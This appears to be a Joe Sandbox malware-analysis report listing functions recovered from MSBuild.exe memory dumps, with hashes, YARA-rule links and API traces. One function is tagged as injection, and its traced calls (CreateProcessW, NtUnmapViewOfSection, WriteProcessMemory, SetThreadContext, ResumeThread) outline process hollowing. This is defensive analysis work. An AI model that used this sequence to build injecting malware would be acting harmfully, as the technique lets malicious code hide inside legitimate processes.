String ID:
API String ID:
Opcode ID: 8a5b626235272e1b9920b87f30da888586d0b1a781575c079c0ee06d9e709e50
Instruction ID: 52c73c3b93426217db12e6e9c6d6e6fdcb2b025c05d30cd663ba6195d6377cd3
Opcode Fuzzy Hash: 8a5b626235272e1b9920b87f30da888586d0b1a781575c079c0ee06d9e709e50
Instruction Fuzzy Hash: DFF09030BC92654BCB186775E51832B33D66BD028DB404A28EB06C76C9DFA0D840C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 02E30B10, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67da8ef5c5271038391063c19793d0210d65ad6be9ec9a36e01e90d0b2894109
Instruction ID: cd1a911e840dfcc037ea89f62b451a64d1ed96a12c52d4fe9c6554a4f4fa00d7
Opcode Fuzzy Hash: 67da8ef5c5271038391063c19793d0210d65ad6be9ec9a36e01e90d0b2894109
Instruction Fuzzy Hash: B8F0E571C092AC9FCB01EBB4E9615DF7BB5DF01204B118CE7D804DB2A2EA319E04C781

Uniqueness

Uniqueness Score: -1.00%

Function 02E30FB0, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b600459d8aef1d7b79fe5522819724745503aaa91a9c28113a382d8240a0f8e
Instruction ID: 8531a68259391506da64a9149aa2dd5cbbf6544f24f432f5356142687eb4cf57
Opcode Fuzzy Hash: 0b600459d8aef1d7b79fe5522819724745503aaa91a9c28113a382d8240a0f8e
Instruction Fuzzy Hash: FDF01778640211CFDB05EFB1D168A69BBB6FF48359F1189AEE5068B3A1CB359842CF01

Uniqueness

Uniqueness Score: -1.00%

Function 02E35980, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 789b28284ae3babd09620d5e8bdce2d0ef8157224f4a380824b1f02aed4cf4bf
Instruction ID: 2312b8ebeeb2177df5e15871a57813623ff5ca38e25d1872fa28b14d37898ae9
Opcode Fuzzy Hash: 789b28284ae3babd09620d5e8bdce2d0ef8157224f4a380824b1f02aed4cf4bf
Instruction Fuzzy Hash: 32E065357401009BC314AB66E464A9BBBEAEBC9261750863AE509C3345DE709C4187A0

Uniqueness

Uniqueness Score: -1.00%

Function 02E30B70, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 813cc69a7cc32926eb832bfed6ccc24e66d60a7ca1aa7b95e27a886a262f8d7e
Instruction ID: 60959220de987348de08e96349307f9acfcea67f6f9827990ecde7e2ba7bf187
Opcode Fuzzy Hash: 813cc69a7cc32926eb832bfed6ccc24e66d60a7ca1aa7b95e27a886a262f8d7e
Instruction Fuzzy Hash: E0E02B3154D3640FC343E66DD8106D17BE8CB02345B0158F7E854C7291F2109C44C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 02E30B38, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.366702037.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f70cbe36752f26857e7d7d43d847c9e31aaad558626f1b1c35c2557e5bd47522
Instruction ID: 7bbf32032468ec36b70022253d4f2527bc210616243fb97fe3b6535c52ab63ba
Opcode Fuzzy Hash: f70cbe36752f26857e7d7d43d847c9e31aaad558626f1b1c35c2557e5bd47522
Instruction Fuzzy Hash: E6D01770E0115CEB8B40EFA9EA4059FB7BAEB44205B1089A9D808D7210EB316E009B80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: MSBuild.exe PID: 6408 Parent PID: 6368 MSBuild.exeCOMMON

Executed Functions

Function 05170054, Relevance: 15.3, APIs: 10, Instructions: 345
injectionthreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 05170468: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,05170083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 05170487

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 05170167
NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 05170192
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 051701C9
TerminateProcess.KERNELBASE(?,78B5B983,00000000,00000000,00000000,0000002E,?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000), ref: 051701EE
WriteProcessMemory.KERNELBASE(?,D83D6AA1,00000000,?,?,?,?,?,0000002E,00000022,0000003E,00000022,00000036,?,?,?), ref: 05170264
WriteProcessMemory.KERNELBASE(?,D83D6AA1,00000000,?,?,?,?,00000000,0000002E,00000046,00000022,00000026,0000003E,00000026,?,CF14E85B), ref: 05170344
GetThreadContext.KERNELBASE(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,D83D6AA1,00000000,?,?,?), ref: 0517039C
WriteProcessMemory.KERNELBASE(?,D83D6AA1,00000000,?,?,?,00000004,?,00000046,0000002E,00000032,00000022,?,0000002E,00000032), ref: 051703E5
SetThreadContext.KERNELBASE(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,D83D6AA1,00000000,?,?,?,00000004), ref: 05170430
ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,D83D6AA1,00000000), ref: 05170450

Memory Dump Source

Source File: 00000006.00000002.450106472.0000000005170000.00000040.00000001.sdmp, Offset: 05170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5170000_MSBuild.jbxd

Similarity

API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateResumeSectionTerminateUnmapView
String ID:
API String ID: 3227675673-0
Opcode ID: 6bd050ccd71be095f7951d70fe6daa94f65a95e4bea105c957737abff2634a53
Instruction ID: 9a7a7bf7a7c892d14564873e85ca372dcea790c994c0d032917f0032bbbf98ed
Opcode Fuzzy Hash: 6bd050ccd71be095f7951d70fe6daa94f65a95e4bea105c957737abff2634a53
Instruction Fuzzy Hash: 3EB1AD70380318BBE515B7B8CC4EF293676AF89B04F208558A3166E5E7CBA35D119B62

Uniqueness

Uniqueness Score: -1.00%

Function 05170000, Relevance: 6.2, APIs: 4, Instructions: 183
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 05170054: CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 05170167

NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 05170192
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 051701C9
TerminateProcess.KERNELBASE(?,78B5B983,00000000,00000000,00000000,0000002E,?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000), ref: 051701EE

Memory Dump Source

Source File: 00000006.00000002.450106472.0000000005170000.00000040.00000001.sdmp, Offset: 05170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5170000_MSBuild.jbxd

Similarity

API ID: Process$AllocCreateSectionTerminateUnmapViewVirtual
String ID:
API String ID: 238767287-0
Opcode ID: f0e36072f0d803358786783193423716685470687ce3d2626fb539a5d7cc9ee3
Instruction ID: 85f70a8198ad96fd4475741217537cd634a8f10ba2627cb5877565023f4629c4
Opcode Fuzzy Hash: f0e36072f0d803358786783193423716685470687ce3d2626fb539a5d7cc9ee3
Instruction Fuzzy Hash: E3513470384344BBE61277B48C1EF193B769F4AB04F244599B3556E5E3DBE69800DB23

Uniqueness

Uniqueness Score: -1.00%

Function 05224790, Relevance: .5, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a49d8df4b4f98b6332ab878b72fdce3b5cce951d482bb17445095e5f7cfd12b2
Instruction ID: b3b3eb634d32e573e2c2a5a1c65bfe9b23aae4d1eb4c071e1ceb06b4eb38a712
Opcode Fuzzy Hash: a49d8df4b4f98b6332ab878b72fdce3b5cce951d482bb17445095e5f7cfd12b2
Instruction Fuzzy Hash: 9E220678A10215DFDB58DF68C884B99BBB2BF4A314F158598E40D9B362CB31ED86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05220448, Relevance: .5, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8931bb0084f4d66dcba43bd5c83506dfa752a5564cc6e7f2abb3639efb82aa47
Instruction ID: 8636c2912c73cb8c641619187521b7a6730ed8fa6578c403389627b9e9ea1eeb
Opcode Fuzzy Hash: 8931bb0084f4d66dcba43bd5c83506dfa752a5564cc6e7f2abb3639efb82aa47
Instruction Fuzzy Hash: 2922E474A11229CFCB24DF25C488B99BBB2FF89314F5185A9E40A9B361CB75DD82CF41

Uniqueness

Uniqueness Score: -1.00%

Function 05223610, Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaaed8e7134ee61d5d6a5132ad377e3443615b3ee82d8a31462bad774248ab2c
Instruction ID: d7f4649fa75b932b56014817821a09069051e5894a3135c127e74338ea621714
Opcode Fuzzy Hash: aaaed8e7134ee61d5d6a5132ad377e3443615b3ee82d8a31462bad774248ab2c
Instruction Fuzzy Hash: 2DF1B274A10209DFCB08CF99C58499DBBF2BF88314B25C599E809AB365D738ED49CF50

Uniqueness

Uniqueness Score: -1.00%

Function 052218F0, Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e119bda1fb767166bd212de963af4c8cee6c1180aa6427d5a4b98795a89a6dd
Instruction ID: 24e73c491e4101e6193e8c1e0b257bd64bad512fa6018657aa6ec6ed39dff92e
Opcode Fuzzy Hash: 6e119bda1fb767166bd212de963af4c8cee6c1180aa6427d5a4b98795a89a6dd
Instruction Fuzzy Hash: 81915074A102599FDF14DFA5C844BAEBBF7EFC4300F148429E80AAB3A4DB759952CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05434359, Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNELBASE(00000000), ref: 054343D0

Memory Dump Source

Source File: 00000006.00000002.450406713.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5430000_MSBuild.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 0c9f5b79ff76951b53bd912e06cb67273affcc15d8c4e33dfe98a9f6075feacd
Instruction ID: 772b793911d6f4a478654a4616a204c380779539e8b43d1e4d9cbe96ab2bce05
Opcode Fuzzy Hash: 0c9f5b79ff76951b53bd912e06cb67273affcc15d8c4e33dfe98a9f6075feacd
Instruction Fuzzy Hash: 272133B1D0465A9FCB10CF9AC4457EEFBB4BF48224F14852AD819A7340D738A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05432D54, Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNELBASE(00000000), ref: 054343D0

Memory Dump Source

Source File: 00000006.00000002.450406713.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5430000_MSBuild.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 4298b3af5b781e9329fd4a9db60da802f0c1d2959850d54f33b800404c96de62
Instruction ID: 285c3f390f3eb32a18af1cfd9bd6234d070249e261201398eca6c10747a724f5
Opcode Fuzzy Hash: 4298b3af5b781e9329fd4a9db60da802f0c1d2959850d54f33b800404c96de62
Instruction Fuzzy Hash: 462133B1D0461A9BCB10CF9AC4497EEFBB4BB48224F04812AD819B7340D738A950CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0495D7F0, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,?,0495D6FA), ref: 0495D857

Memory Dump Source

Source File: 00000006.00000002.447714878.0000000004950000.00000040.00000001.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4950000_MSBuild.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 83afd1157ef3df79763035387849e6c6bb72f39699e0fdef5930bab8347c909c
Instruction ID: 6ce455663311a5e7797b6a0504371b84c1cb760bf2c730f9f1c95d5a838051ff
Opcode Fuzzy Hash: 83afd1157ef3df79763035387849e6c6bb72f39699e0fdef5930bab8347c909c
Instruction Fuzzy Hash: BF1103B5800659CFCB10DF9AD485BDEBBF4EB49324F20842AD929A7300D775A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0495D4DC, Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,?,0495D6FA), ref: 0495D857

Memory Dump Source

Source File: 00000006.00000002.447714878.0000000004950000.00000040.00000001.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4950000_MSBuild.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 1b28563a2fd74fb7c39f4a0d4ae1ea492bd8c798397929d5bceb7379f244cbd8
Instruction ID: f371bb6aee5392ec5ac5d6697827ed83cbf86711bea31357fd263ff01c84deb1
Opcode Fuzzy Hash: 1b28563a2fd74fb7c39f4a0d4ae1ea492bd8c798397929d5bceb7379f244cbd8
Instruction Fuzzy Hash: 611125B0800249CFCB10DF9AD484BDEBBF8EB48324F208429D929A3200D774A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05226700, Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

tm, xrefs: 05226873

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID: tm
API String ID: 0-368580048
Opcode ID: d1f1c20b5c25e411d77b12055a0056e50331d47b689ce05c2c1f2368e51bbb39
Instruction ID: df9091f118f0c25e193bf88e1100f592290bcc20d804e357d42d49f0d6f76817
Opcode Fuzzy Hash: d1f1c20b5c25e411d77b12055a0056e50331d47b689ce05c2c1f2368e51bbb39
Instruction Fuzzy Hash: E0218534A102189FCB14DFA5DC55BEEBBB6EF88310F108019E909A7385CB71AD01CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 05170468, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,05170083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 05170487

Memory Dump Source

Source File: 00000006.00000002.450106472.0000000005170000.00000040.00000001.sdmp, Offset: 05170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5170000_MSBuild.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 777949476312c33e5c7cc227b67c8279abaea1a0a066d20807b753c2aedbfa8e
Instruction ID: c97af31f8a52fc7cb45031905a4a0dc2e80f1fb496509d96d1694d289ed90295
Opcode Fuzzy Hash: 777949476312c33e5c7cc227b67c8279abaea1a0a066d20807b753c2aedbfa8e
Instruction Fuzzy Hash: EED0127134430479E15177B58C0DF197AE2AF48741F10C814B39D280E6CBB698145B16

Uniqueness

Uniqueness Score: -1.00%

Function 05225608, Relevance: .4, Instructions: 418COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83534703b1d34de5b6c7a920a3c947bd3e9c26d534932d2f62bb75be794d4e7e
Instruction ID: 5d0ba056bb5ef527d548f6a79ab13b36c63aa7f0923b5a1cadae5670c62541f7
Opcode Fuzzy Hash: 83534703b1d34de5b6c7a920a3c947bd3e9c26d534932d2f62bb75be794d4e7e
Instruction Fuzzy Hash: 2302F774A10218DFDB24DFA8C884BAEBBF6FF88304F108569E506A7361DB75A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05225D48, Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13124b4e56ac1f917a73bfdfee0f1ff9da29cea48cf48590aa525b2a5638f9a1
Instruction ID: 51ae2b177553a611a2bd370c4c756e113a46a0994cf90ebd25fbcc9ede4ce25d
Opcode Fuzzy Hash: 13124b4e56ac1f917a73bfdfee0f1ff9da29cea48cf48590aa525b2a5638f9a1
Instruction Fuzzy Hash: 01E15B35A14319DFCB14CFA4C988AAEBBB6FF89310F148059E909AB351CB35ED51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 05227818, Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a100c70addfa3e42991f1f5df5ae2da980fcc57bdd19ddbb933b37bccc378969
Instruction ID: 173db5d9ba49cd97991ae86f7a6231d63fe9afdc9f369e457329f16b20042dcb
Opcode Fuzzy Hash: a100c70addfa3e42991f1f5df5ae2da980fcc57bdd19ddbb933b37bccc378969
Instruction Fuzzy Hash: 9DC13774B202549FCB14DFB8C895A6EBBF6EF89710B148829E40ADB355DF74EC418B90

Uniqueness

Uniqueness Score: -1.00%

Function 0522043A, Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1f17002d43f602156b68ee738294b1d681dd117e9aee44e4d38b29d7244c837
Instruction ID: 989dfb80a43117d92cce753e1586621f99dc0fb16d9c9bdc519a010b68cf7ded
Opcode Fuzzy Hash: c1f17002d43f602156b68ee738294b1d681dd117e9aee44e4d38b29d7244c837
Instruction Fuzzy Hash: 60E1E434A11219CFCB64DF25C888B99B7B2FF89305F9185A9E40A9B361CB35DD81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05223601, Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f4248d5a8596db83d43446b282a7b226dfa7114f3fc9f7fb2de9262f3296eba
Instruction ID: 25f0492299e2c15e6e83e1afbe7757a554dc9fc51b3d94cc19009d652115a107
Opcode Fuzzy Hash: 7f4248d5a8596db83d43446b282a7b226dfa7114f3fc9f7fb2de9262f3296eba
Instruction Fuzzy Hash: 41C1B378A10219DFCB08DF99C584A99BBF2FF88310B25C598E809AF365D774ED49CB40

Uniqueness

Uniqueness Score: -1.00%

Function 052290F0, Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba035702d40ba0c50b7254d7570e8b989992b03964d9abe52e399ffbe311551b
Instruction ID: b265a99d587a7282667a48e215f77059192a11b06be0632abea17dd4ac93cf2c
Opcode Fuzzy Hash: ba035702d40ba0c50b7254d7570e8b989992b03964d9abe52e399ffbe311551b
Instruction Fuzzy Hash: 5D91F334714215AFCB20DFA9D980A6EB7F6EF84304F108929E509CB351CB35EC86CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05226E88, Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b8442fd80c8d7a2deaff64b52fdd599d2789b93c9050637a3e1e19d47892b8
Instruction ID: 137f1dac1a3386fc0d14a319841f7949e8429de21f543128532e7c20aeaf457f
Opcode Fuzzy Hash: b8b8442fd80c8d7a2deaff64b52fdd599d2789b93c9050637a3e1e19d47892b8
Instruction Fuzzy Hash: 6591C034228713ABD724DF59D54497A73B3FF80314B24CA28E09B87664DB70F98AC796

Uniqueness

Uniqueness Score: -1.00%

Function 05220C89, Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc785a9ab0eb7df051cfcaeb1d2b2e0ed310331e140891c833f8f68b7feb8c18
Instruction ID: e7636423427e77871b988b9bede59ff8745f2b3cff668d1d38dde851b8cb8b6a
Opcode Fuzzy Hash: bc785a9ab0eb7df051cfcaeb1d2b2e0ed310331e140891c833f8f68b7feb8c18
Instruction Fuzzy Hash: 84B10838A14329CFDB64CF64C948B99B7B2FF49304F5085A8E50AAB390CB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0522295F, Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e65f5d10e6d7cf694256da881a1eab046fa0fdc150455997aa55c5666792e976
Instruction ID: be41dd0f7d19cc2c5b2c56c466ce71c01b4d8848a11df1f6b28be305fa350576
Opcode Fuzzy Hash: e65f5d10e6d7cf694256da881a1eab046fa0fdc150455997aa55c5666792e976
Instruction Fuzzy Hash: 37A1F078A1021ADFDB04CF69C584A99BBF2FF4C310F558195E819AB362D771E886CF60

Uniqueness

Uniqueness Score: -1.00%

Function 05222E00, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ff29a92f83ff903ae422d6705fb2f3cace29d284a0e5f78e8b95eda9e0d2646
Instruction ID: 4b4ab0980fc638b142dac31a1e213a9c44fe92b65f2f88baf77da4c37b3a3af0
Opcode Fuzzy Hash: 5ff29a92f83ff903ae422d6705fb2f3cace29d284a0e5f78e8b95eda9e0d2646
Instruction Fuzzy Hash: 77914574610705CFCB24CF29C584A9ABBF2FF48310B158A99E49A9B661D731FD86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05228A88, Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceb6b204c5e789184c264e78bdf7d46c99dcd75a0599fc0c8d1884ef119a7c8d
Instruction ID: 742e49c1015b12cd043cc07cb1e88b21b3f0b11da8c8f3af56ffeb9757cf70b6
Opcode Fuzzy Hash: ceb6b204c5e789184c264e78bdf7d46c99dcd75a0599fc0c8d1884ef119a7c8d
Instruction Fuzzy Hash: 62813739B10215CFCB14DF69D88896ABBF6FF88611B1580A9E54ACB371CB71EC42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05220BE4, Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68d2509f26609463be6a82d389dc84de6a21b412eda19a8d0d6a17135b643b7a
Instruction ID: 73abb0539564027a693f82e9f36b593cc2b561361ab370cc54705bb303121516
Opcode Fuzzy Hash: 68d2509f26609463be6a82d389dc84de6a21b412eda19a8d0d6a17135b643b7a
Instruction Fuzzy Hash: A1A11874A10229CFCB64CF24C588B99BBB2FF89305F5185A9D40AAB361CB35DD81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05222270, Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18fff6f2156e74e55567183b8cbf7b868c9a84b9da272f64bc4d3521f54ceadc
Instruction ID: e242ae4bd8bdcf397fb444b422053e2538bb9b296951d0d0ba57517be19196e7
Opcode Fuzzy Hash: 18fff6f2156e74e55567183b8cbf7b868c9a84b9da272f64bc4d3521f54ceadc
Instruction Fuzzy Hash: 9F814C79A10119EFDB14DFA5D848EAEBBF6FF88310F048125F506A7260CB75A941DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0522A39B, Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b4253d11c8aae26bd7144aa7762b868dff5870481233af6dfb359136c647bdb
Instruction ID: 85d570c470103cba0658429e9f369838d25546e90815d323f0b2cb1675262a96
Opcode Fuzzy Hash: 3b4253d11c8aae26bd7144aa7762b868dff5870481233af6dfb359136c647bdb
Instruction Fuzzy Hash: 4781E734A10124DFDB24DB64C898F59B7B6FF89304F158099E90A9B365CB35ED82CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 052212B0, Relevance: .2, Instructions: 164COMMON

